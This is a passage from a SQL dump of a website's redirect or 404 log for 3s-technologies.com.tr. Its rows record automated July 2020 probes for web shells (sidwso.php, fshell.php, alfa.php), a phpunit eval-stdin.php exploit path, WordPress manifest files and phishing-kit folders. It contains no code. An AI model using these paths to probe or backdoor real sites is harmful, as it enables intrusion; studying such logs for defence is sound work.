00:00:00',301),(25515,'http://3s-technologies.com.tr/tr/components/com_content/views/archive/edit_page.php',NULL,'http://site.ru','',1,0,'2020-07-01 10:53:37','0000-00-00 00:00:00',301),(25516,'http://3s-technologies.com.tr/tr/delete/default.php',NULL,'http://site.ru','',1,0,'2020-07-01 11:43:57','0000-00-00 00:00:00',301),(25517,'http://3s-technologies.com.tr/en/contacts/validator.php',NULL,'','',1,0,'2020-07-01 14:12:08','0000-00-00 00:00:00',301),(25518,'http://3s-technologies.com.tr/tr//vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',3,0,'2020-07-03 21:31:11','0000-00-00 00:00:00',301),(25519,'http://3s-technologies.com.tr/en/blog/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2020-07-06 10:55:26','0000-00-00 00:00:00',301),(25520,'http://3s-technologies.com.tr/en/backup/wp-includes/wlwmanifest.xml',NULL,'','',1,0,'2020-07-06 10:58:11','0000-00-00 00:00:00',301),(25521,'http://3s-technologies.com.tr/en/home/wp-includes/wlwmanifest.xml',NULL,'','',3,0,'2020-07-06 10:59:50','0000-00-00 00:00:00',301),(25522,'http://3s-technologies.com.tr/en/shop/wp-includes/wlwmanifest.xml',NULL,'','',4,0,'2020-07-06 11:02:10','0000-00-00 00:00:00',301),(25523,'http://3s-technologies.com.tr/en/v1/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2020-07-06 11:09:30','0000-00-00 00:00:00',301),(25524,'http://3s-technologies.com.tr/tr/moshax.php',NULL,'http://site.ru','',8,0,'2020-07-06 17:29:57','0000-00-00 00:00:00',301),(25525,'http://3s-technologies.com.tr/tr/wp-admin/include.php.php',NULL,'http://site.ru','',4,0,'2020-07-06 18:20:13','0000-00-00 00:00:00',301),(25526,'http://3s-technologies.com.tr/tr/includes/includes.php',NULL,'http://site.ru','',10,0,'2020-07-06 19:08:54','0000-00-00 00:00:00',301),(25527,'http://3s-technologies.com.tr/tr/docindex.php',NULL,'http://site.ru','',15,0,'2020-07-06 21:36:50','0000-00-00 00:00:00',301),(25528,'http://3s-technologies.com.tr/tr/gtclftvnykfhnakk.html',NULL,'','',1,0,'2020-07-07 07:25:14','0000-00-00 00:00:00',301),(25529,'http://3s-technologies.com.tr/tr/templates/beez3/crvjyyzenb.php',NULL,'http://site.ru','',1,0,'2020-07-07 11:58:51','0000-00-00 00:00:00',301),(25530,'http://3s-technologies.com.tr/tr/libraries/phputf8/mbstring/wugznindex.php',NULL,'http://site.ru','',1,0,'2020-07-07 11:59:41','0000-00-00 00:00:00',301),(25531,'http://3s-technologies.com.tr/tr/legend.txt',NULL,'','',2,0,'2020-07-07 12:10:53','0000-00-00 00:00:00',301),(25532,'http://3s-technologies.com.tr/tr/home/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-07 12:27:10','0000-00-00 00:00:00',301),(25533,'http://3s-technologies.com.tr/tr/nsgin.com/simple.php5',NULL,'http://site.ru','',1,0,'2020-07-07 12:27:19','0000-00-00 00:00:00',301),(25534,'http://3s-technologies.com.tr/tr/templates/protostar/o.php',NULL,'http://site.ru','',2,0,'2020-07-07 12:27:31','0000-00-00 00:00:00',301),(25535,'http://3s-technologies.com.tr/tr/nas.php',NULL,'http://site.ru','',4,0,'2020-07-07 12:54:38','0000-00-00 00:00:00',301),(25536,'http://3s-technologies.com.tr/tr/templates/protostar/wpforx.php',NULL,'http://site.ru','',1,0,'2020-07-07 12:54:41','0000-00-00 00:00:00',301),(25537,'http://3s-technologies.com.tr/tr/media/mod_languages/mod_languages.php',NULL,'http://site.ru','',2,0,'2020-07-07 13:47:08','0000-00-00 00:00:00',301),(25538,'http://3s-technologies.com.tr/tr/nsgin.com/cache/doc.php',NULL,'http://site.ru','',2,0,'2020-07-07 14:13:43','0000-00-00 00:00:00',301),(25539,'http://3s-technologies.com.tr/tr/sbyq8l.php',NULL,'http://site.ru','',4,0,'2020-07-07 14:13:52','0000-00-00 00:00:00',301),(25540,'http://3s-technologies.com.tr/tr/detallito.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-07 14:14:27','0000-00-00 00:00:00',301),(25541,'http://3s-technologies.com.tr/tr/modules/mod_verison/css.php',NULL,'http://site.ru','',5,0,'2020-07-07 14:39:25','0000-00-00 00:00:00',301),(25542,'http://3s-technologies.com.tr/tr/libraries/joomla/application/web/router/62931939.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:05:37','0000-00-00 00:00:00',301),(25543,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/6010.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:05:42','0000-00-00 00:00:00',301),(25544,'http://3s-technologies.com.tr/tr/media/media/data.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:05:43','0000-00-00 00:00:00',301),(25545,'http://3s-technologies.com.tr/tr/clienteempresarialesfera.online/includes.php',NULL,'http://site.ru','',2,0,'2020-07-07 15:31:27','0000-00-00 00:00:00',301),(25546,'http://3s-technologies.com.tr/tr/components/as.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-07 15:31:52','0000-00-00 00:00:00',301),(25547,'http://3s-technologies.com.tr/tr/libraries/joomla/mail/wrapper/tuzbsindex.php',NULL,'http://site.ru','',1,0,'2020-07-07 15:33:08','0000-00-00 00:00:00',301),(25548,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/updates/postgresql/.h..php',NULL,'http://site.ru','',1,0,'2020-07-07 15:57:13','0000-00-00 00:00:00',301),(25549,'http://3s-technologies.com.tr/tr/templates/atomic/420.php',NULL,'http://site.ru','',1,0,'2020-07-07 16:48:22','0000-00-00 00:00:00',301),(25550,'http://3s-technologies.com.tr/tr/components/com_mailto/mod/px.php',NULL,'http://site.ru','',3,0,'2020-07-07 17:14:24','0000-00-00 00:00:00',301),(25551,'http://3s-technologies.com.tr/tr/bin/wp-info.php',NULL,'http://site.ru','',4,0,'2020-07-07 17:41:47','0000-00-00 00:00:00',301),(25552,'http://3s-technologies.com.tr/tr/libraries/joomla/observer/70330634.php',NULL,'http://site.ru','',1,0,'2020-07-07 17:41:53','0000-00-00 00:00:00',301),(25553,'http://3s-technologies.com.tr/tr/aunktdgnwh.php',NULL,'http://site.ru','',1,0,'2020-07-07 17:43:09','0000-00-00 00:00:00',301),(25554,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/zr.php',NULL,'http://site.ru','',6,0,'2020-07-07 18:06:52','0000-00-00 00:00:00',301),(25555,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/wp-imags.php',NULL,'http://site.ru','',3,0,'2020-07-07 18:07:48','0000-00-00 00:00:00',301),(25556,'http://3s-technologies.com.tr/tr/cjfeax.php',NULL,'http://site.ru','',3,0,'2020-07-07 18:59:58','0000-00-00 00:00:00',301),(25557,'http://3s-technologies.com.tr/tr/libraries/joomla/base/js.php',NULL,'http://site.ru','',1,0,'2020-07-07 19:00:04','0000-00-00 00:00:00',301),(25558,'http://3s-technologies.com.tr/tr/libraries/joomla/cache/storage/vrzjiindex.php',NULL,'http://site.ru','',2,0,'2020-07-07 19:53:39','0000-00-00 00:00:00',301),(25559,'http://3s-technologies.com.tr/tr/language/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-07 21:13:43','0000-00-00 00:00:00',301),(25560,'http://3s-technologies.com.tr/tr/images/headers/images.php',NULL,'http://site.ru','',1,0,'2020-07-07 21:14:06','0000-00-00 00:00:00',301),(25561,'http://3s-technologies.com.tr/tr/templates/beez3/alfa.php',NULL,'http://site.ru','',1,0,'2020-07-07 21:38:59','0000-00-00 00:00:00',301),(25562,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/wawalo.php.php',NULL,'http://site.ru','',1,0,'2020-07-07 21:39:00','0000-00-00 00:00:00',301),(25563,'http://3s-technologies.com.tr/tr/includes/moshax.php',NULL,'http://site.ru','',2,0,'2020-07-07 21:39:08','0000-00-00 00:00:00',301),(25564,'http://3s-technologies.com.tr/tr/language/pdf_fonts/xml.php',NULL,'http://site.ru','',2,0,'2020-07-07 21:39:38','0000-00-00 00:00:00',301),(25565,'http://3s-technologies.com.tr/tr/consultorestimeshare.mx/docindex.php',NULL,'http://site.ru','',3,0,'2020-07-07 22:05:44','0000-00-00 00:00:00',301),(25566,'http://3s-technologies.com.tr/tr/templates/protostar/news.php',NULL,'http://site.ru','',1,0,'2020-07-07 22:32:51','0000-00-00 00:00:00',301),(25567,'http://3s-technologies.com.tr/tr/cache/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-07 22:33:04','0000-00-00 00:00:00',301),(25568,'http://3s-technologies.com.tr/tr/tvrmpt.php',NULL,'http://site.ru','',2,0,'2020-07-07 22:59:26','0000-00-00 00:00:00',301),(25569,'http://3s-technologies.com.tr/tr/odfnjn.php',NULL,'http://site.ru','',3,0,'2020-07-07 23:00:13','0000-00-00 00:00:00',301),(25570,'http://3s-technologies.com.tr/tr/language/ar-aa/c16b/oqkoiindex.php',NULL,'http://site.ru','',3,0,'2020-07-07 23:52:23','0000-00-00 00:00:00',301),(25571,'http://3s-technologies.com.tr/tr/components/com_newsfeeds/views/d1.php',NULL,'http://site.ru','',1,0,'2020-07-07 23:52:24','0000-00-00 00:00:00',301),(25572,'http://3s-technologies.com.tr/tr/administrator/templates/isis/doc.php',NULL,'http://site.ru','',4,0,'2020-07-08 00:18:28','0000-00-00 00:00:00',301),(25573,'http://3s-technologies.com.tr/tr/files/fileswb.php',NULL,'http://site.ru','',3,0,'2020-07-08 00:18:49','0000-00-00 00:00:00',301),(25574,'http://3s-technologies.com.tr/en/wp-cson.php?canshu=1',NULL,'','',2,0,'2020-07-08 00:30:23','0000-00-00 00:00:00',301),(25575,'http://3s-technologies.com.tr/tr/libraries/joomla/string/vgwmrindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 01:38:31','0000-00-00 00:00:00',301),(25576,'http://3s-technologies.com.tr/tr/modules/mod_search/mark.php',NULL,'http://site.ru','',2,0,'2020-07-08 01:38:33','0000-00-00 00:00:00',301),(25577,'http://3s-technologies.com.tr/tr/nsyyg9.php',NULL,'http://site.ru','',4,0,'2020-07-08 02:06:34','0000-00-00 00:00:00',301),(25578,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/models/forms/wp-side.php',NULL,'http://site.ru','',1,0,'2020-07-08 02:31:05','0000-00-00 00:00:00',301),(25579,'http://3s-technologies.com.tr/tr/logs.php',NULL,'http://site.ru','',20,0,'2020-07-08 02:31:06','0000-00-00 00:00:00',301),(25580,'http://3s-technologies.com.tr/tr/bin/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 02:31:08','0000-00-00 00:00:00',301),(25581,'http://3s-technologies.com.tr/tr/aguasie.com/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 03:04:42','0000-00-00 00:00:00',301),(25582,'http://3s-technologies.com.tr/tr/ijiti5.php',NULL,'http://site.ru','',2,0,'2020-07-08 04:13:21','0000-00-00 00:00:00',301),(25583,'http://3s-technologies.com.tr/tr/wmuwp8.php',NULL,'http://site.ru','',2,0,'2020-07-08 04:13:28','0000-00-00 00:00:00',301),(25584,'http://3s-technologies.com.tr/tr/bfmy4u.php',NULL,'http://site.ru','',3,0,'2020-07-08 04:14:04','0000-00-00 00:00:00',301),(25585,'http://3s-technologies.com.tr/tr/templates/protostar/wp.php',NULL,'http://site.ru','',1,0,'2020-07-08 04:38:56','0000-00-00 00:00:00',301),(25586,'http://3s-technologies.com.tr/tr/templates/protostar/66989894562222323326.php',NULL,'http://site.ru','',1,0,'2020-07-08 04:39:05','0000-00-00 00:00:00',301),(25587,'http://3s-technologies.com.tr/tr/plugins/system/css.php',NULL,'http://site.ru','',1,0,'2020-07-08 04:45:02','0000-00-00 00:00:00',301),(25588,'http://3s-technologies.com.tr/tr/wp-admin/wp-admin.php',NULL,'http://site.ru','',72,0,'2020-07-08 05:04:12','0000-00-00 00:00:00',301),(25589,'http://3s-technologies.com.tr/tr/components/com_aicontactsafe/models/css.php',NULL,'http://site.ru','',1,0,'2020-07-08 05:04:25','0000-00-00 00:00:00',301),(25590,'http://3s-technologies.com.tr/tr/blog/cache/cache.php',NULL,'http://site.ru','',2,0,'2020-07-08 05:57:03','0000-00-00 00:00:00',301),(25591,'http://3s-technologies.com.tr/tr/components/com_foxcontact/aku.php',NULL,'http://site.ru','',1,0,'2020-07-08 05:57:08','0000-00-00 00:00:00',301),(25592,'http://3s-technologies.com.tr/tr/tmp/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 05:57:12','0000-00-00 00:00:00',301),(25593,'http://3s-technologies.com.tr/tr/templates/beez5/html/com_contact/dm2.php',NULL,'http://site.ru','',2,0,'2020-07-08 05:57:34','0000-00-00 00:00:00',301),(25594,'http://3s-technologies.com.tr/tr/cli/wp-info.php',NULL,'http://site.ru','',1,0,'2020-07-08 06:50:06','0000-00-00 00:00:00',301),(25595,'http://3s-technologies.com.tr/tr/modules/mod_verison/dsqindex.php',NULL,'http://site.ru','',3,0,'2020-07-08 07:16:11','0000-00-00 00:00:00',301),(25596,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/magic.php.php',NULL,'http://site.ru','',3,0,'2020-07-08 07:16:16','0000-00-00 00:00:00',301),(25597,'http://3s-technologies.com.tr/tr/cli/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 07:41:37','0000-00-00 00:00:00',301),(25598,'http://3s-technologies.com.tr/tr/cli/izo.php',NULL,'http://site.ru','',1,0,'2020-07-08 07:42:06','0000-00-00 00:00:00',301),(25599,'http://3s-technologies.com.tr/tr/cli/xjs14.php',NULL,'http://site.ru','',2,0,'2020-07-08 07:42:09','0000-00-00 00:00:00',301),(25600,'http://3s-technologies.com.tr/tr/libraries/joomla/cache/storage/xcrvbindex.php',NULL,'http://site.ru','',2,0,'2020-07-08 07:42:13','0000-00-00 00:00:00',301),(25601,'http://3s-technologies.com.tr/tr/templates/atomic/ex.php',NULL,'http://site.ru','',1,0,'2020-07-08 08:11:23','0000-00-00 00:00:00',301),(25602,'http://3s-technologies.com.tr/tr/xmlrpc/includes/definesd.php',NULL,'http://site.ru','',2,0,'2020-07-08 08:43:24','0000-00-00 00:00:00',301),(25603,'http://3s-technologies.com.tr/tr/kmt2wh.php',NULL,'http://site.ru','',2,0,'2020-07-08 09:03:15','0000-00-00 00:00:00',301),(25604,'http://3s-technologies.com.tr/tr/components/com_banners/models/css.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:03:15','0000-00-00 00:00:00',301),(25605,'http://3s-technologies.com.tr/tr/files/sidwso.php',NULL,'http://site.ru','',2,0,'2020-07-08 09:29:20','0000-00-00 00:00:00',301),(25606,'http://3s-technologies.com.tr/tr/oz2gu9.php',NULL,'http://site.ru','',4,0,'2020-07-08 09:29:36','0000-00-00 00:00:00',301),(25607,'http://3s-technologies.com.tr/tr/modules/mod_footer/tmpl/tmpl.php',NULL,'http://site.ru','',2,0,'2020-07-08 09:29:56','0000-00-00 00:00:00',301),(25608,'http://3s-technologies.com.tr/tr/plugins/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:55:33','0000-00-00 00:00:00',301),(25609,'http://3s-technologies.com.tr/tr/blog/blog.php',NULL,'http://site.ru','',7,0,'2020-07-08 09:55:56','0000-00-00 00:00:00',301),(25610,'http://3s-technologies.com.tr/tr/templates/beez5/404.php',NULL,'http://site.ru','',1,0,'2020-07-08 09:56:02','0000-00-00 00:00:00',301),(25611,'http://3s-technologies.com.tr/tr/vvvhcldqst.php',NULL,'http://site.ru','',4,0,'2020-07-08 09:56:33','0000-00-00 00:00:00',301),(25612,'http://3s-technologies.com.tr/tr/administrator/c:/a/wamp/www/curb-appea/administrator/conf.php',NULL,'http://site.ru','',1,0,'2020-07-08 10:22:10','0000-00-00 00:00:00',301),(25613,'http://3s-technologies.com.tr/tr/modules/mod_users_latest/data.php',NULL,'http://site.ru','',3,0,'2020-07-08 10:49:14','0000-00-00 00:00:00',301),(25614,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/magic.php',NULL,'http://site.ru','',2,0,'2020-07-08 11:42:17','0000-00-00 00:00:00',301),(25615,'http://3s-technologies.com.tr/tr/layouts/joomla/joomla.php',NULL,'http://site.ru','',1,0,'2020-07-08 12:36:20','0000-00-00 00:00:00',301),(25616,'http://3s-technologies.com.tr/tr/plugins/vmcustom/vmcustom.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:30:34','0000-00-00 00:00:00',301),(25617,'http://3s-technologies.com.tr/tr/plugins/vmcustom/vmcustom.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:30:34','0000-00-00 00:00:00',301),(25618,'http://3s-technologies.com.tr/tr/templates/beez3/wp.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:56:41','0000-00-00 00:00:00',301),(25619,'http://3s-technologies.com.tr/tr/tmp/adrixvz4.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:56:46','0000-00-00 00:00:00',301),(25620,'http://3s-technologies.com.tr/tr/xmlrpc/cache/xml.php',NULL,'http://site.ru','',1,0,'2020-07-08 13:57:49','0000-00-00 00:00:00',301),(25621,'http://3s-technologies.com.tr/tr/components/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 14:22:49','0000-00-00 00:00:00',301),(25622,'http://3s-technologies.com.tr/tr/newagenciajm.com.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 17:27:06','0000-00-00 00:00:00',301),(25623,'http://3s-technologies.com.tr/tr/xaolicygrk.php',NULL,'http://site.ru','',1,0,'2020-07-08 17:27:29','0000-00-00 00:00:00',301),(25624,'http://3s-technologies.com.tr/tr/aguasie.mx/docindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 17:51:45','0000-00-00 00:00:00',301),(25625,'http://3s-technologies.com.tr/tr/language/ru-ru/ru-ru.php',NULL,'http://site.ru','',2,0,'2020-07-08 17:52:04','0000-00-00 00:00:00',301),(25626,'http://3s-technologies.com.tr/tr/components/com_akeeba/models/css_.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-08 18:18:12','0000-00-00 00:00:00',301),(25627,'http://3s-technologies.com.tr/tr/administrator/components/com_ajax/images.php',NULL,'http://site.ru','',2,0,'2020-07-08 18:42:06','0000-00-00 00:00:00',301),(25628,'http://3s-technologies.com.tr/tr/language/overrides/overrides.php',NULL,'http://site.ru','',2,0,'2020-07-08 18:42:10','0000-00-00 00:00:00',301),(25629,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/models/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-08 18:42:21','0000-00-00 00:00:00',301),(25630,'http://3s-technologies.com.tr/tr/plugins/pluginsc.php',NULL,'http://site.ru','',1,0,'2020-07-08 19:07:09','0000-00-00 00:00:00',301),(25631,'http://3s-technologies.com.tr/tr/templates/marijuana.php',NULL,'http://site.ru','',2,0,'2020-07-08 19:31:46','0000-00-00 00:00:00',301),(25632,'http://3s-technologies.com.tr/tr/libraries/joomla/language/mnfmmindex.php',NULL,'http://site.ru','',1,0,'2020-07-08 19:56:35','0000-00-00 00:00:00',301),(25633,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/models/data.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-08 20:22:08','0000-00-00 00:00:00',301),(25634,'http://3s-technologies.com.tr/tr/modules/mod_verison/mod_verison.php',NULL,'http://site.ru','',3,0,'2020-07-08 20:22:10','0000-00-00 00:00:00',301),(25635,'http://3s-technologies.com.tr/tr/templates/protostar/adrianavz.php',NULL,'http://site.ru','',1,0,'2020-07-08 20:46:52','0000-00-00 00:00:00',301),(25636,'http://3s-technologies.com.tr/tr/tgfqxt.php',NULL,'http://site.ru','',3,0,'2020-07-08 20:46:56','0000-00-00 00:00:00',301),(25637,'http://3s-technologies.com.tr/tr/templates/atomic/info.php',NULL,'http://site.ru','',2,0,'2020-07-08 20:48:51','0000-00-00 00:00:00',301),(25638,'http://3s-technologies.com.tr/tr/templates/atomic/fshell.php',NULL,'http://site.ru','',1,0,'2020-07-08 21:36:33','0000-00-00 00:00:00',301),(25639,'http://3s-technologies.com.tr/tr/me63ql.php',NULL,'http://site.ru','',4,0,'2020-07-08 21:36:33','0000-00-00 00:00:00',301),(25640,'http://3s-technologies.com.tr/tr/templates/atomic/wp-img.php',NULL,'http://site.ru','',2,0,'2020-07-08 21:36:41','0000-00-00 00:00:00',301),(25641,'http://3s-technologies.com.tr/tr/libraries/sidwso.php',NULL,'http://site.ru','',1,0,'2020-07-08 22:50:39','0000-00-00 00:00:00',301),(25642,'http://3s-technologies.com.tr/tr/libraries/joomla/mail/language/rjtwbindex.php.php',NULL,'http://site.ru','',4,0,'2020-07-08 23:15:32','0000-00-00 00:00:00',301),(25643,'http://3s-technologies.com.tr/tr/fshell.php',NULL,'http://site.ru','',3,0,'2020-07-09 00:54:45','0000-00-00 00:00:00',301),(25644,'http://3s-technologies.com.tr/tr/deep.php',NULL,'http://site.ru','',2,0,'2020-07-09 01:44:10','0000-00-00 00:00:00',301),(25645,'http://3s-technologies.com.tr/tr/libraries/joomla/github/package/data/48129110.php',NULL,'http://site.ru','',2,0,'2020-07-09 03:48:03','0000-00-00 00:00:00',301),(25646,'http://3s-technologies.com.tr/tr/modules/mod_breadcrumbs/wp-class.php',NULL,'http://site.ru','',1,0,'2020-07-09 04:12:39','0000-00-00 00:00:00',301),(25647,'http://3s-technologies.com.tr/tr/administrator/components/com_ajax/dm2.php',NULL,'http://site.ru','',1,0,'2020-07-09 05:02:45','0000-00-00 00:00:00',301),(25648,'http://3s-technologies.com.tr/tr/gtech.mx/docindex.php',NULL,'http://site.ru','',2,0,'2020-07-09 05:40:21','0000-00-00 00:00:00',301),(25649,'http://3s-technologies.com.tr/tr/google-site-verification-content-fpk8ez12pdbewljjo9xhbxlv7lhxa9nplpcode87_hack.php',NULL,'http://site.ru','',1,0,'2020-07-09 06:06:08','0000-00-00 00:00:00',301),(25650,'http://3s-technologies.com.tr/tr/oluxx.php',NULL,'http://site.ru','',1,0,'2020-07-09 06:06:35','0000-00-00 00:00:00',301),(25651,'http://www.3s-technologies.com.tr/tr/static/js/common.js',NULL,'','',2,0,'2020-07-09 08:47:31','0000-00-00 00:00:00',301),(25652,'http://3s-technologies.com.tr/tr/about.php',NULL,'http://site.ru','',894,0,'2020-07-09 09:39:44','0000-00-00 00:00:00',301),(25653,'http://3s-technologies.com.tr/tr/wpa.php',NULL,'http://site.ru','',5,0,'2020-07-09 09:39:51','0000-00-00 00:00:00',301),(25654,'http://3s-technologies.com.tr/tr/inc.php',NULL,'http://site.ru','',71,0,'2020-07-09 13:48:53','0000-00-00 00:00:00',301),(25655,'http://3s-technologies.com.tr/tr/cache/ups.php',NULL,'http://site.ru','',2,0,'2020-07-09 14:44:41','0000-00-00 00:00:00',301),(25656,'http://3s-technologies.com.tr/tr/cache/ups.php.suspected',NULL,'http://site.ru','',6,0,'2020-07-09 14:45:41','0000-00-00 00:00:00',301),(25657,'http://3s-technologies.com.tr/tr/auth/login',NULL,'','',3,0,'2020-07-09 14:56:45','0000-00-00 00:00:00',301),(25658,'http://3s-technologies.com.tr/tr/editor',NULL,'','',1,0,'2020-07-09 14:56:48','0000-00-00 00:00:00',301),(25659,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/others/media-admin.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-09 15:55:08','0000-00-00 00:00:00',301),(25660,'http://3s-technologies.com.tr/tr/libraries/joomla/base/phpmailer.php',NULL,'http://site.ru','',3,0,'2020-07-09 15:55:52','0000-00-00 00:00:00',301),(25661,'http://3s-technologies.com.tr/tr/media-admin.php',NULL,'http://site.ru','',29,0,'2020-07-09 15:57:06','0000-00-00 00:00:00',301),(25662,'http://3s-technologies.com.tr/tr/lf.php',NULL,'http://site.ru','',39,0,'2020-07-09 16:21:04','0000-00-00 00:00:00',301),(25663,'http://3s-technologies.com.tr/tr/components/com_banners/metadata.php',NULL,'http://site.ru','',5,0,'2020-07-09 16:21:08','0000-00-00 00:00:00',301),(25664,'http://3s-technologies.com.tr/tr/ups.php.suspected',NULL,'http://site.ru','',7,0,'2020-07-09 16:48:48','0000-00-00 00:00:00',301),(25665,'http://3s-technologies.com.tr/tr/pamos.php',NULL,'http://site.ru','',4,0,'2020-07-09 17:17:40','0000-00-00 00:00:00',301),(25666,'http://3s-technologies.com.tr/tr/inco.php',NULL,'http://site.ru','',7,0,'2020-07-09 17:45:28','0000-00-00 00:00:00',301),(25667,'http://3s-technologies.com.tr/tr/backup_2/smith.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-09 17:52:02','0000-00-00 00:00:00',301),(25668,'http://3s-technologies.com.tr/tr/small_dick.php.suspected',NULL,'http://site.ru','',5,0,'2020-07-09 18:14:04','0000-00-00 00:00:00',301),(25669,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/newversion.php',NULL,'http://site.ru','',2,0,'2020-07-09 18:14:35','0000-00-00 00:00:00',301),(25670,'http://3s-technologies.com.tr/tr/87/index.php',NULL,'http://site.ru','',4,0,'2020-07-09 18:41:37','0000-00-00 00:00:00',301),(25671,'http://3s-technologies.com.tr/tr/assets/images/ups.php',NULL,'http://site.ru','',7,0,'2020-07-09 18:42:52','0000-00-00 00:00:00',301),(25672,'http://3s-technologies.com.tr/tr/history/sporttam/resources/views/user/edit.blade.php',NULL,'http://site.ru','',3,0,'2020-07-09 19:09:39','0000-00-00 00:00:00',301),(25673,'http://3s-technologies.com.tr/tr/cache/0908989909876/cnxbxnxixix/wetransfer/wetransfer/index.php',NULL,'http://site.ru','',5,0,'2020-07-09 19:37:11','0000-00-00 00:00:00',301),(25674,'http://3s-technologies.com.tr/tr/assets/images/doc.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-09 20:05:05','0000-00-00 00:00:00',301),(25675,'http://3s-technologies.com.tr/tr/asdf.php.suspected',NULL,'http://site.ru','',4,0,'2020-07-09 20:32:31','0000-00-00 00:00:00',301),(25676,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/models/forms/new_side.php',NULL,'http://site.ru','',2,0,'2020-07-09 20:32:34','0000-00-00 00:00:00',301),(25677,'http://3s-technologies.com.tr/tr/manager/media/browser/mcpuk/js/browser/joiner.php',NULL,'http://site.ru','',3,0,'2020-07-09 21:31:47','0000-00-00 00:00:00',301),(25678,'http://3s-technologies.com.tr/tr/assets/images/ups.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-09 21:55:22','0000-00-00 00:00:00',301),(25679,'http://3s-technologies.com.tr/tr/wetranafer4893489/wetransfer/wetransfer/index.php',NULL,'http://site.ru','',2,0,'2020-07-09 21:55:40','0000-00-00 00:00:00',301),(25680,'http://3s-technologies.com.tr/tr/h4ck_.php',NULL,'http://site.ru','',3,0,'2020-07-11 19:09:29','0000-00-00 00:00:00',301),(25681,'http://3s-technologies.com.tr/tr/lsn_an.php',NULL,'http://site.ru','',1,0,'2020-07-11 19:36:44','0000-00-00 00:00:00',301),(25682,'http://3s-technologies.com.tr/tr/pdo.inc.php',NULL,'http://site.ru','',1,0,'2020-07-11 19:36:59','0000-00-00 00:00:00',301),(25683,'http://3s-technologies.com.tr/tr/.ftp.php',NULL,'http://site.ru','',2,0,'2020-07-11 19:38:38','0000-00-00 00:00:00',301),(25684,'http://3s-technologies.com.tr/tr/mm.php',NULL,'http://site.ru','',63,0,'2020-07-11 20:35:16','0000-00-00 00:00:00',301),(25685,'http://3s-technologies.com.tr/tr/backup.php',NULL,'http://site.ru','',88,0,'2020-07-11 20:35:26','0000-00-00 00:00:00',301),(25686,'http://3s-technologies.com.tr/tr/wp-inc.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-11 23:14:57','0000-00-00 00:00:00',301),(25687,'http://3s-technologies.com.tr/tr/usi.php',NULL,'http://site.ru','',3,0,'2020-07-11 23:15:32','0000-00-00 00:00:00',301),(25688,'http://3s-technologies.com.tr/tr/fghhgfs.php',NULL,'http://site.ru','',1,0,'2020-07-12 01:54:43','0000-00-00 00:00:00',301),(25689,'http://3s-technologies.com.tr/tr/includes.php',NULL,'http://site.ru','',4,0,'2020-07-12 04:07:31','0000-00-00 00:00:00',301),(25690,'http://3s-technologies.com.tr/tr/ok.php',NULL,'http://site.ru','',194,0,'2020-07-12 04:08:45','0000-00-00 00:00:00',301),(25691,'http://3s-technologies.com.tr/tr/.smileys/license.php',NULL,'http://site.ru','',2,0,'2020-07-12 06:54:56','0000-00-00 00:00:00',301),(25692,'http://3s-technologies.com.tr/tr/wp-consoles.php',NULL,'http://site.ru','',3,0,'2020-07-12 06:55:21','0000-00-00 00:00:00',301),(25693,'http://3s-technologies.com.tr/tr/cwyiog.php',NULL,'http://site.ru','',3,0,'2020-07-12 07:50:40','0000-00-00 00:00:00',301),(25694,'http://3s-technologies.com.tr/tr/xgasupx.php',NULL,'http://site.ru','',3,0,'2020-07-12 08:47:41','0000-00-00 00:00:00',301),(25695,'https://www.3s-technologies.com.tr/tr/images/global/lfs',NULL,'','',19,0,'2020-07-14 18:44:28','0000-00-00 00:00:00',301),(25696,'http://www.3s-technologies.com.tr/tr/iifqnqyuoxntfm.html',NULL,'','',1,0,'2020-07-15 02:09:57','0000-00-00 00:00:00',301),(25697,'https://www.3s-technologies.com.tr/tr/images/ddm/reflow',NULL,'','',18,0,'2020-07-15 11:12:07','0000-00-00 00:00:00',301),(25698,'https://3s-technologies.com.tr/tr/images/global/lfs',NULL,'','',22,0,'2020-07-16 01:09:33','0000-00-00 